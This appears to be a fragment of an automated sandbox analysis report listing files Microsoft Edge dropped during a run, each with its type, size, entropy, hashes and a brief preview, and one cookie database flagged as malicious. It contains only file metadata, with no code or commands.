                                                                                                                                                                                                                                                                                      SHA-512:9B6C0275430CC4C02767E2B83F947D9DD930712065EEB684A6F2CF975724B4FD463070C03D348ED313F381D132ED1B895FE17CCB2EB4A073BD24044293CD0C7B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:32.097 13d4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/20-04:54:32.098 13d4 Recovering log #3.2024/11/20-04:54:32.101 13d4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\1ca9319e-2074-4fa9-80d8-1ef7cbaafbeb.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\5b1fc9f9-00b6-4653-ae00-6abdd6185340.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\74453821-1d72-4736-a0a7-10802b3a0a3a.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\7900b108-5932-4d20-94b9-3b8a55ed15eb.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):2.8248402491682754
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:tTr+/FMofWcKFXJIeoZP3GgGGFQXLbl0c4p0L/ZJVb:Vy9zfWcUXJIdZf+XL50lp0LhJVb
                                                                                                                                                                                                                                                                                      MD5:3CF7784F48C874DAFA788AA704BAF421
                                                                                                                                                                                                                                                                                      SHA1:6CCAC189D065308E1C823F987AD16B658A32E9E1
                                                                                                                                                                                                                                                                                      SHA-256:9E5D5A83D4C707E5C8261DD1B9F6C1630F2BE08797CCC40DC20CA9687EABF7A1
                                                                                                                                                                                                                                                                                      SHA-512:7D73E5051F6953CB39807CDA4975A1C2E89C5B6FF94D2F9D586E95A5874E7F3FEBBA604AC6FBB11157D52B89AEA06BAA9FCEFBC3B8A989DEFC1F5EE1DE37C749
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1452
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.287526653429432
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n+:YcCpWsktsHnfc7CvsfgCgakhYhbj
                                                                                                                                                                                                                                                                                      MD5:C11A0C2888E9122AF3E0A9532E7CF485
                                                                                                                                                                                                                                                                                      SHA1:213F8630A4D6B265DB899E1B4FED27EC8F2F1C75
                                                                                                                                                                                                                                                                                      SHA-256:F08277C5DFC76862C95DA3763626FC4A099530B656C9ED5C42DE6E3079D64B57
                                                                                                                                                                                                                                                                                      SHA-512:BB02933E6DF73CF073C94460869B99200E08C1B293D476B6F7C76F012B0BF9126A60031A31555CB755DF9C464B16272FEB6B1E0C0528FFAF5BB934F5E87A279E
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):36864
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.2795759273493437
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB+o:JkIEumQv8m1ccnvS6k+iiJs51a
                                                                                                                                                                                                                                                                                      MD5:D12139CBDBC88A43854F88E7D36C9F07
                                                                                                                                                                                                                                                                                      SHA1:B09BE0CD4C2BE454183F12B3B0056B74E7D98E2A
                                                                                                                                                                                                                                                                                      SHA-256:4523D4EFBB34588E823F8593AD74475AD2A19C0C584AD0E263D84C4960F534C8
                                                                                                                                                                                                                                                                                      SHA-512:6D43106D2163EF06D3790D293512F3811523CF66216FBD14FD75813C007ED0F571E7A69500CA3D8C69C182B813E9B2C92662036C6CD68E0B332CBA9A7F91C919
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3b7e7.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3cc98.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3d831.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF46b1a.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\a63d87ed-644a-404b-a62d-dc65a87a6541.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1452
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.287526653429432
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n+:YcCpWsktsHnfc7CvsfgCgakhYhbj
                                                                                                                                                                                                                                                                                      MD5:C11A0C2888E9122AF3E0A9532E7CF485
                                                                                                                                                                                                                                                                                      SHA1:213F8630A4D6B265DB899E1B4FED27EC8F2F1C75
                                                                                                                                                                                                                                                                                      SHA-256:F08277C5DFC76862C95DA3763626FC4A099530B656C9ED5C42DE6E3079D64B57
                                                                                                                                                                                                                                                                                      SHA-512:BB02933E6DF73CF073C94460869B99200E08C1B293D476B6F7C76F012B0BF9126A60031A31555CB755DF9C464B16272FEB6B1E0C0528FFAF5BB934F5E87A279E
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\b72a8c28-c47d-4812-8afd-1e429f49ecf2.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\e3f32f1e-abe6-41df-bd1b-522b52454ad6.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                      MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                      SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                      SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                      SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (16623), with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16631
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.447596014397479
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:stoJ99QTryDigabatSuypKsA4iaaFvrE9kfIYvdofbZKT6bPZPoYha8obV+F2CQL:stoPGKSu4KsA4VCDI4MFR+bG/Qw3a
                                                                                                                                                                                                                                                                                      MD5:513853D4439C1D901FA8ED86337EBA2A
                                                                                                                                                                                                                                                                                      SHA1:53DBDC954619FD909F37C6C62F4FD7EF1A9ED129
                                                                                                                                                                                                                                                                                      SHA-256:740B2169765CE4F50DD644E632C1585901D2E886516472F31FF72862571D7D96
                                                                                                                                                                                                                                                                                      SHA-512:52E0CA76BF67BF10452E308A003808A810167AAE85CDA06E5A76EA2885CB435B38CFF4B7442A5862E4D181FBE1B8422C5119045230E7098876882C6556DDB057
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
